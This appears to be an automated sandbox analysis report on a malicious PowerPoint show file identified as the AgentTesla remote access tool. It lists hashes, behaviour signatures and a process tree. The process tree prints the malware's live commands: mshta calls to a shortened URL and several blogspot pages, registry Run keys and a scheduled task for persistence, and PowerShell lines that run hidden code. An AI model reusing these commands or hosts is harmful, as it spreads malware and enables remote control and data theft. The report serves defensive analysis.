Analysis
-
max time kernel
86s -
max time network
138s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-02-2021 18:39
Static task
static1
Behavioral task
behavioral1
Sample
25.pps
Resource
win7v20201028
Behavioral task
behavioral2
Sample
25.pps
Resource
win10v20201028
General
-
Target
25.pps
-
Size
143KB
-
MD5
c475bbc0142c89758cb3f15625f5dee7
-
SHA1
eea1ff58d1a0b6a471f9a34d97b102c2cd0a3431
-
SHA256
7df670fa6de80e87fa03dfba84f5777054d5a55737f8fce07679a637342250a3
-
SHA512
241a3575dd78dcc2b4f20d20a46f53f4910c7e613ba1dba87b5dd7c9aaa4cc5ebf83784c2560e60fee5ad11732cb3a36a445a6cc82ae851e10367fbbdda8ad9f
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mSHtA.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1980 3300 mSHtA.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3852 3300 ping.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3304-66-0x0000000000400000-0x000000000043E000-memory.dmp family_agenttesla behavioral2/memory/3304-67-0x000000000043828E-mapping.dmp family_agenttesla -
Blocklisted process makes network request 13 IoCs
Processes:
mSHtA.exePowershell.exeflow pid process 30 1980 mSHtA.exe 32 1980 mSHtA.exe 34 1980 mSHtA.exe 36 1980 mSHtA.exe 41 1980 mSHtA.exe 43 1980 mSHtA.exe 44 1980 mSHtA.exe 45 1980 mSHtA.exe 47 1980 mSHtA.exe 49 1980 mSHtA.exe 51 1980 mSHtA.exe 52 1980 mSHtA.exe 57 3124 Powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mSHtA.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/19.html\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/19.html\"\", 0 : window.close\")" mSHtA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")" mSHtA.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 3124 set thread context of 3304 3124 Powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2972 1980 WerFault.exe mSHtA.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winword.exePOWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2668 taskkill.exe 1280 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 3300 POWERPNT.EXE 3688 winword.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
WerFault.exePowershell.exePowershell.exeaspnet_compiler.exepid process 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 1472 Powershell.exe 3124 Powershell.exe 1472 Powershell.exe 3124 Powershell.exe 3124 Powershell.exe 1472 Powershell.exe 3304 aspnet_compiler.exe 3304 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWerFault.exePowershell.exePowershell.exedescription pid process Token: SeDebugPrivilege 2668 taskkill.exe Token: SeDebugPrivilege 1280 taskkill.exe Token: SeDebugPrivilege 2972 WerFault.exe Token: SeDebugPrivilege 1472 Powershell.exe Token: SeDebugPrivilege 3124 Powershell.exe Token: SeIncreaseQuotaPrivilege 1472 Powershell.exe Token: SeSecurityPrivilege 1472 Powershell.exe Token: SeTakeOwnershipPrivilege 1472 Powershell.exe Token: SeLoadDriverPrivilege 1472 Powershell.exe Token: SeSystemProfilePrivilege 1472 Powershell.exe Token: SeSystemtimePrivilege 1472 Powershell.exe Token: SeProfSingleProcessPrivilege 1472 Powershell.exe Token: SeIncBasePriorityPrivilege 1472 Powershell.exe Token: SeCreatePagefilePrivilege 1472 Powershell.exe Token: SeBackupPrivilege 1472 Powershell.exe Token: SeRestorePrivilege 1472 Powershell.exe Token: SeShutdownPrivilege 1472 Powershell.exe Token: SeDebugPrivilege 1472 Powershell.exe Token: SeSystemEnvironmentPrivilege 1472 Powershell.exe Token: SeRemoteShutdownPrivilege 1472 Powershell.exe Token: SeUndockPrivilege 1472 Powershell.exe Token: SeManageVolumePrivilege 1472 Powershell.exe Token: 33 1472 Powershell.exe Token: 34 1472 Powershell.exe Token: 35 1472 Powershell.exe Token: 36 1472 Powershell.exe Token: SeIncreaseQuotaPrivilege 3124 Powershell.exe Token: SeSecurityPrivilege 3124 Powershell.exe Token: SeTakeOwnershipPrivilege 3124 Powershell.exe Token: SeLoadDriverPrivilege 3124 Powershell.exe Token: SeSystemProfilePrivilege 3124 Powershell.exe Token: SeSystemtimePrivilege 3124 Powershell.exe Token: SeProfSingleProcessPrivilege 3124 Powershell.exe Token: SeIncBasePriorityPrivilege 3124 Powershell.exe Token: SeCreatePagefilePrivilege 3124 Powershell.exe Token: SeBackupPrivilege 3124 Powershell.exe Token: SeRestorePrivilege 3124 Powershell.exe Token: SeShutdownPrivilege 3124 Powershell.exe Token: SeDebugPrivilege 3124 Powershell.exe Token: SeSystemEnvironmentPrivilege 3124 Powershell.exe Token: SeRemoteShutdownPrivilege 3124 Powershell.exe Token: SeUndockPrivilege 3124 Powershell.exe Token: SeManageVolumePrivilege 3124 Powershell.exe Token: 33 3124 Powershell.exe Token: 34 3124 Powershell.exe Token: 35 3124 Powershell.exe Token: 36 3124 Powershell.exe Token: SeIncreaseQuotaPrivilege 3124 Powershell.exe Token: SeSecurityPrivilege 3124 Powershell.exe Token: SeTakeOwnershipPrivilege 3124 Powershell.exe Token: SeLoadDriverPrivilege 3124 Powershell.exe Token: SeSystemProfilePrivilege 3124 Powershell.exe Token: SeSystemtimePrivilege 3124 Powershell.exe Token: SeProfSingleProcessPrivilege 3124 Powershell.exe Token: SeIncBasePriorityPrivilege 3124 Powershell.exe Token: SeCreatePagefilePrivilege 3124 Powershell.exe Token: SeBackupPrivilege 3124 Powershell.exe Token: SeRestorePrivilege 3124 Powershell.exe Token: SeShutdownPrivilege 3124 Powershell.exe Token: SeDebugPrivilege 3124 Powershell.exe Token: SeSystemEnvironmentPrivilege 3124 Powershell.exe Token: SeRemoteShutdownPrivilege 3124 Powershell.exe Token: SeUndockPrivilege 3124 Powershell.exe Token: SeManageVolumePrivilege 3124 Powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 3300 POWERPNT.EXE 3688 winword.exe 3688 winword.exe 3688 winword.exe 3300 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
POWERPNT.EXEmSHtA.exePowershell.exedescription pid process target process PID 3300 wrote to memory of 1980 3300 POWERPNT.EXE mSHtA.exe PID 3300 wrote to memory of 1980 3300 POWERPNT.EXE mSHtA.exe PID 3300 wrote to memory of 3852 3300 POWERPNT.EXE ping.exe PID 3300 wrote to memory of 3852 3300 POWERPNT.EXE ping.exe PID 3300 wrote to memory of 3688 3300 POWERPNT.EXE winword.exe PID 3300 wrote to memory of 3688 3300 POWERPNT.EXE winword.exe PID 1980 wrote to memory of 1404 1980 mSHtA.exe schtasks.exe PID 1980 wrote to memory of 1404 1980 mSHtA.exe schtasks.exe PID 1980 wrote to memory of 3124 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 3124 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 3124 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 1472 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 1472 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 1472 1980 mSHtA.exe Powershell.exe PID 1980 wrote to memory of 2668 1980 mSHtA.exe taskkill.exe PID 1980 wrote to memory of 2668 1980 mSHtA.exe taskkill.exe PID 1980 wrote to memory of 1280 1980 mSHtA.exe taskkill.exe PID 1980 wrote to memory of 1280 1980 mSHtA.exe taskkill.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe PID 3124 wrote to memory of 3304 3124 Powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mSHtA.exemSHtA http://12384928198391823%12384928198391823@j.mp/akawasdiaodiasdokwnduhand2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/19.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1980 -s 28843⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
memory/1280-19-0x0000000000000000-mapping.dmp
-
memory/1404-15-0x0000000000000000-mapping.dmp
-
memory/1472-53-0x000000000A470000-0x000000000A471000-memory.dmpFilesize
4KB
-
memory/1472-30-0x0000000006DE2000-0x0000000006DE3000-memory.dmpFilesize
4KB
-
memory/1472-24-0x0000000004730000-0x0000000004731000-memory.dmpFilesize
4KB
-
memory/1472-51-0x0000000009C90000-0x0000000009C91000-memory.dmpFilesize
4KB
-
memory/1472-47-0x0000000009ED0000-0x0000000009ED1000-memory.dmpFilesize
4KB
-
memory/1472-43-0x0000000008380000-0x0000000008381000-memory.dmpFilesize
4KB
-
memory/1472-57-0x000000000AFF0000-0x000000000AFF1000-memory.dmpFilesize
4KB
-
memory/1472-25-0x0000000007420000-0x0000000007421000-memory.dmpFilesize
4KB
-
memory/1472-17-0x0000000000000000-mapping.dmp
-
memory/1472-62-0x000000000A310000-0x000000000A311000-memory.dmpFilesize
4KB
-
memory/1472-27-0x0000000006DE0000-0x0000000006DE1000-memory.dmpFilesize
4KB
-
memory/1472-22-0x0000000073380000-0x0000000073A6E000-memory.dmpFilesize
6.9MB
-
memory/1980-7-0x0000000000000000-mapping.dmp
-
memory/2668-18-0x0000000000000000-mapping.dmp
-
memory/2972-20-0x000001F3387C0000-0x000001F3387C1000-memory.dmpFilesize
4KB
-
memory/3124-33-0x0000000007FC0000-0x0000000007FC1000-memory.dmpFilesize
4KB
-
memory/3124-49-0x000000000A300000-0x000000000A301000-memory.dmpFilesize
4KB
-
memory/3124-21-0x0000000073380000-0x0000000073A6E000-memory.dmpFilesize
6.9MB
-
memory/3124-29-0x0000000005132000-0x0000000005133000-memory.dmpFilesize
4KB
-
memory/3124-16-0x0000000000000000-mapping.dmp
-
memory/3124-31-0x0000000007760000-0x0000000007761000-memory.dmpFilesize
4KB
-
memory/3124-65-0x000000000A7F0000-0x000000000A803000-memory.dmpFilesize
76KB
-
memory/3124-35-0x00000000080A0000-0x00000000080A1000-memory.dmpFilesize
4KB
-
memory/3124-37-0x0000000008290000-0x0000000008291000-memory.dmpFilesize
4KB
-
memory/3124-39-0x0000000008660000-0x0000000008661000-memory.dmpFilesize
4KB
-
memory/3124-41-0x00000000086A0000-0x00000000086A1000-memory.dmpFilesize
4KB
-
memory/3124-63-0x0000000005133000-0x0000000005134000-memory.dmpFilesize
4KB
-
memory/3124-45-0x00000000097B0000-0x00000000097B1000-memory.dmpFilesize
4KB
-
memory/3124-28-0x0000000005130000-0x0000000005131000-memory.dmpFilesize
4KB
-
memory/3300-5-0x00007FF8C6890000-0x00007FF8C6EC7000-memory.dmpFilesize
6.2MB
-
memory/3300-4-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-6-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-2-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-55-0x00007FF8C46A0000-0x00007FF8C627D000-memory.dmpFilesize
27.9MB
-
memory/3300-58-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-59-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-60-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-61-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3300-3-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmpFilesize
64KB
-
memory/3304-66-0x0000000000400000-0x000000000043E000-memory.dmpFilesize
248KB
-
memory/3304-67-0x000000000043828E-mapping.dmp
-
memory/3304-68-0x0000000073380000-0x0000000073A6E000-memory.dmpFilesize
6.9MB
-
memory/3304-72-0x0000000005840000-0x0000000005841000-memory.dmpFilesize
4KB
-
memory/3304-73-0x00000000056A0000-0x00000000056A1000-memory.dmpFilesize
4KB
-
memory/3304-74-0x00000000057E0000-0x00000000057E1000-memory.dmpFilesize
4KB
-
memory/3688-14-0x00007FF8C6890000-0x00007FF8C6EC7000-memory.dmpFilesize
6.2MB
-
memory/3688-9-0x0000000000000000-mapping.dmp
-
memory/3852-8-0x0000000000000000-mapping.dmp